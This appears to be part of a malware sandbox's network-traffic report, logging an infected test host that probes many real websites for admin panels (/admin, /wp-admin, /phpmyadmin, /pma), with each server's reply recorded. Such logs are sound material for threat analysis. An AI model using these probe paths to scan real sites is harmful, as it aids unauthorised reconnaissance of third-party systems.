                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/phpMyAdmin/">here</a></body>


Session ID | Source IP | Source Port | Destination IP | Destination Port
435 | 192.168.2.6 | 63048 | 164.100.128.15 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.444693089 CET | 176 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.817985058 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://upsconline.nic.in/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
436 | 192.168.2.6 | 62960 | 164.100.213.210 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.459352016 CET | 171 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.920877934 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:16:08.121624947 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:16:08.322884083 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
437 | 192.168.2.6 | 63474 | 192.185.5.23 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.494709015 CET | 169 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.699369907 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=be23f1af5ca825b96bd4b26c0ea58c06; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
438 | 192.168.2.6 | 63177 | 45.60.74.50 | 2222
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.544609070 CET | 896 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Cache-Control: no-cache, no-store
Connection: close
Content-Length: 695
X-Iinfo: 7-2915941-0 0NNN RT(1707131767345 8) q(-1 -1 -1 -1) r(0 -1) b1
Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=7-2915941-0%200NNN%20RT%281707131767345%208%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-16370418770058055&edet=3&cinfo=ffffffff&pe=575&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-16370418770058055</iframe></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
439 | 192.168.2.6 | 63498 | 96.7.224.178 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.549360991 CET | 170 | OUT | GET /admin/ HTTP/1.1
Host: naukrigulf.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.662498951 CET | 628 | IN | HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 269
Expires: Mon, 05 Feb 2024 11:16:07 GMT
Date: Mon, 05 Feb 2024 11:16:07 GMT
Connection: close
Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131767601_1611129006_213793893_11_11593_136_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3c65</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
440 | 192.168.2.6 | 63507 | 162.241.203.30 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.549551964 CET | 169 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.666007996 CET | 1114 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
441 | 192.168.2.6 | 63547 | 104.21.14.245 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.554266930 CET | 170 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.685595989 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4L5oo9gz1LN%2BLS%2FGlzDuCvv5bsiUERbB%2F6alq9FXrZQoh9FFkoG3ciaq%2B8WI%2Fui8Z1LWkIkAMsRgAFE8Td2TcDdKulXyPM3B%2BRcPGRi2Gykuh%2BKKoub61DzSnFVmk9lIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4b8b88b0bb-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
442 | 192.168.2.6 | 63480 | 54.183.63.241 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.556082010 CET | 172 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749548912 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: AyJhOT
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID: 443 | Source IP: 192.168.2.6 | Source Port: 63576 | Destination IP: 195.85.23.95 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.570847034 CET | 171 | OUT | GET /admin HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.812014103 CET | 1226 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; path=/; domain=.bongacams.com; HttpOnly
location: https://ro.bongacams.com/admin
cache-control: no-cache, no-store, must-revalidate
x-zone: 3-ded7546-web23
CF-Cache-Status: DYNAMIC
Set-Cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
Set-Cookie: fv=AmL3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
Set-Cookie: uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; expires=Tue, 04-Feb-2025 11:16:07 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
Set-Cookie: __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 850abd4bae784546-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 36 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 72 6f 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 65<html><head><meta http-equiv="refresh" content="0;url=https://ro.bongacams.com/admin"/></head></html>
Feb 5, 2024 12:16:07.812050104 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 444 | Source IP: 192.168.2.6 | Source Port: 63378 | Destination IP: 54.71.181.160 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.575823069 CET | 182 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.749387980 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:21 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:16:07.749420881 CET | 97 | IN
Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
445 | 192.168.2.6 | 63432 | 64.190.63.111 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.582190037 CET | 170 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.791523933 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:07 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
446 | 192.168.2.6 | 63456 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.599627018 CET | 181 | OUT | GET /admin/w HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.987869978 CET | 1286 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=81af54a664f4ec74095989818025e221; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:07 GMT; Max-Age=86400
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://innovationdevelopment.eu/admin/w/login
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 1d57<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/ht
Feb 5, 2024 12:16:07.987909079 CET | 1286 | IN
Data Ascii: ml; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131767" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131767" />...<link rel="s
Feb 5, 2024 12:16:07.987946033 CET | 1286 | IN
Data Ascii: draggable.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.button.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.dialog.min.js"></script><script type="text/javascript" src="/js
Feb 5, 2024 12:16:07.987997055 CET | 1286 | IN
Data Ascii: keditor.js"></script><script type="text/javascript" src="/js/ckfinder___3/ckfinder.js"></script><link rel="stylesheet" href="/js/jquery/timepicker/jquery-clockpicker.min.css"><script type="text/javascript" src="/js/jquery/timepicker/j
Feb 5, 2024 12:16:07.988033056 CET | 1286 | IN
Data Ascii: area.ckeditor').each(function(){var ckid=$(this).attr('id');if(ckid=='' || typeof ckid==='undefined'){ckid="ck"+Math.random().toString(36).substring(7);$(this).attr('id',ckid);}var editor = CKEDITOR.replace( cki
Feb 5, 2024 12:16:07.988070011 CET | 1286 | IN
Data Ascii: /a><div id="admin_sidetitle"></div><div id="admin_sidetitle_right"><select name="admin_language" class="admin_language" onChange="document.location.href='/admin/w/language/'+this.value;"><option value="hu" >Magyar</option><option
Feb 5, 2024 12:16:07.988106012 CET | 386 | IN
Data Ascii: t;});</script></div></div><div class="clear"></div><div id="footer"><footer><div id="help_footer"></div><br><br><br><br><br><br><br><br><br></footer></div><div class="clear"></div></div></div><div class="
Feb 5, 2024 12:16:07.995263100 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
447 | 192.168.2.6 | 63488 | 64.190.63.136 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.617816925 CET | 275 | OUT | GET /wp-admin/?sub1=20240205-2216-072b-880c-130055c7e3e5 HTTP/1.1
Host: ww16.followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://followerstiktok.xyz/wp-login.php
Feb 5, 2024 12:16:07.830460072 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:07 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
448 | 192.168.2.6 | 63597 | 54.183.63.241 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.622725964 CET | 173 | OUT | GET /admin HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.802124977 CET | 801 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
location: https://pt.secure.imvu.com/admin/
x-imvu-rnd: wAlCVNwbZTyn9wAcv6C2dfR2yGwB28t
X-Server: Smartling
X-SL-Notranslate: 1
X-SL-Norewrite: 1
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
449 | 192.168.2.6 | 63554 | 64.190.63.136 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.648137093 CET | 220 | OUT | GET /pma/?sub1=20240205-2216-0720-8b5f-fc43330f6951 HTTP/1.1
Host: ww16.followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.858345985 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:07 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
450 | 192.168.2.6 | 63598 | 64.190.63.111 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.674868107 CET | 164 | OUT | GET /admin HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.885473013 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:07 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
451 | 192.168.2.6 | 63569 | 31.216.144.5 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.737652063 CET | 204 | OUT | GET /wp-admin/ HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://mega.nz/wp-login.php
Feb 5, 2024 12:16:07.937711000 CET | 195 | IN | HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://mega.nz
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
452 | 192.168.2.6 | 63779 | 64.91.249.20 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.756752968 CET | 166 | OUT | GET /pma/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.911798954 CET | 349 | IN | HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.chainmine.io/pma/?usid=27&utid=4923817350
Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port
453         192.168.2.6  63680        185.120.71.26   80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.769515991 CET  189  OUT  GET /administrator/index.php HTTP/1.1
Host: www.analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.979180098 CET  394  IN  HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://www.analvids.com/administrator/index.php
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
454         192.168.2.6  63786        64.91.249.20    80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.814578056 CET  242  OUT  GET /wp-admin/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://ww7.chainmine.io/wp-login.php?usid=27&utid=4923817197
Feb 5, 2024 12:16:07.968126059 CET  354  IN  HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.chainmine.io/wp-admin/?usid=27&utid=4923817362
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port
455         192.168.2.6  63864        13.248.169.48   80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.859292984 CET  174  OUT  GET /admin/ HTTP/1.1
Host: secure.vexcorp.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.978429079 CET  1190  IN  HTTP/1.1 200 OK
Server: openresty
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 315
Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
Connection: keep-alive
ETag: "65b834cc-13b"
